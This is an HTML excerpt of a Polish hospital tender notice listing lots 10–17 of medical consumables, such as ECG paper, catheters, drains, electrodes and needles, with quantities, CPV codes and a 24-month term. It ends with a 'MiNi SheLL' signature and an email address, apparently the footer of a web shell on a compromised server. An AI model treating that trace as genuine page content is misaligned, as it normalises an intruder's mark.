<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier do aparatu EKG Ascard B- 56 , 112x25 	Rol.	900
Papier do aparatu EKG  Ascard 3 z nadrukiem, 104x40	Rol.	180
Papier do kopiarki Mitsubishi model K-61 B	Rol.	110
Papier do ap. EKG ASCARD MR. RED  60 x 25 	Rol.	80
Papier do    defibrylatora LIFE PAK 10               50 x 30	Rol.	10
Papier do KTG ANALOGIE typ Fetalgard  Life 152x90x150  bez perforacjiryza	110
Papier do defibrylatora LIFEPAK 12  108 x 25	rol	10
Papier do defibrylatora ZOLL M- series ACIS/P/DC 90x90 x200	ryza	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dreny KEHRA  12,14,16,18,20,22 dł. ramion  30x13 mm	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody COMBO - Quick do defibrylatora LIFE PAK 	Szt.	10
Elektroda do Holtera 	Szt.	12000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do ciągłego znieczulenia nadoponowego O 0,85 x 045x 1000mm ( 20 G) z igła TUCHY 18 G 	Szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zaciskacz do pępowiny sterylny	Szt.	1600
Cewnik Foley  rozmiar 14, 16, 18, 20, 22 	Szt.	3500
Cewnik Nelaton rozmiar  8, 10,18, 20, 22	Szt.	550
Cewnik do odsysania górnych dróg oddechowych  10 dł.400mm	Szt.	400
Cewnik do odsysania górnych dróg oddechowych  8 dł.600mm	Szt.	300
Cewnik do odsysania górnych dróg oddechowych  12 dł.600mm	Szt.	700
Cewnik do odsysania górnych dróg oddechowych  14 dł.600mm	Szt.	1000
Cewnik do odsysania górnych dróg oddechowych  16 dł.500mm	Szt.	1100
Kranik trójdrożny w 4 kolorach biały, niebieski, czerwony, żółty	Szt.	2000
Cewnik do podawania tlenu przez nos,	Szt.	5000
Dren Pezzera 26, 24	Szt.	250
Przedłużacz do pomp infuzyjnych dł. 120 cm.	Szt.	3000
Przedłużacz do pomp infuzyjnych dł. 60 cm.	Szt.	200
Ostrza chirurgiczne 11 , 22, 24   x 100 szt.	Op.	120
Dren REDON   F 8, 10,12, 18  dł.700mm	Szt.	700
Zgłębniki żołądkowe 16, 18  dł. 800 mm. lub 1200 mm	Szt.	600
Zgłębniki żołądkowe 20 dł. 1000 mm lub dł. 1200 mm	Szt.	350
Zgłębnik żołądkowy 35 dł. 1500 mm	Szt.	20
Dren do jamy otrzewnej   24	Szt.	200
Koreczki do wenflonów z membramą pozwalające na podłączenie strzykawki lub przewodu bez konieczności ściągania koreczka, 	Szt.	200
Cewniki do karmienia dzieci z korkiem  6, 8 	Szt.	20
Wzierniki ginekol. j.uż.  Rozm. S,M,L sterylne,	Szt.	11000
Szpatułki drewniane x 100	Op.	70
Kubek do moczu z nakrywka sterylny 	Szt.	6000
Kieliszki do leków j. uż.	Szt.	13000
Maski tlenowe j. uż. dla dorosłych,	Szt.	900
Pałeczki plast. do wymazów ocznych z probówka  bez żelu, sterylne	120
Pałeczka  plastikowa do wymazów ocznych z probówką i żelem, sterylna	Szt.	300
Osłonki medyczne na głowice do usg  dopochwowe  x 144 szt	op	25
Igły biopsyjne do szpiku kostnego 16 G x 30mm	szt	5
Koreczki do wenflonów sterylne	szt.	30000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-9, 33.14.12.00-2, 33.14.16.40-8, 33.14.14.11-4, 33.14.16.41-6, 33.14.13.20-9, 33.68.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staza bezlateksowa w kolorze niebieskim wykonana z szerokiego rozciągliwego paska gumy syntetycznej. Opakowanie 1 rolka (25 szt.).	Op.	50
Zestaw do odsysania pola operacyjnego standardowy składający się z całkowicie transparentnej końcówki Yankauer Ch 23 (O 3,80 mm/7,59 mm (wew./zew.)) z 4 otworami bocznymi oraz pojedynczym zagięciem krzywizny bez kontroli odsysania, drenu łączącego Ch24 (O 5,60 mm/8,00 mm (wew./zew.)) o długości 210cm  z zakończeniem typu lejek-lejek ze specjalnymi przegubami (sprężynami zgięciowymi) oraz z możliwością docięcia w oznaczonych miejscach łącznika i dopasowania do każdego typu ssaka (do średnicy krućca od 8 mm do 18 mm), sterylny.  	szt.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-9, 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igła z otworem bocznym do pobierania leków z fiolek z gumowym korkiem, z zakończeniem typu PencilPoint, zapobiegająca fragmentacji korka, rozm. 1,2 dł min. 30mm (18G). Op a100szt. 	szt	75000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczoteczki do wymazów cytologicznych tzw. cytobrush  sterylne, umożliwiające pobranie w rozmazie jednocześnie  komórek z szyjki macicy, kanału szyjki i strefy transformacji.	Szt.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com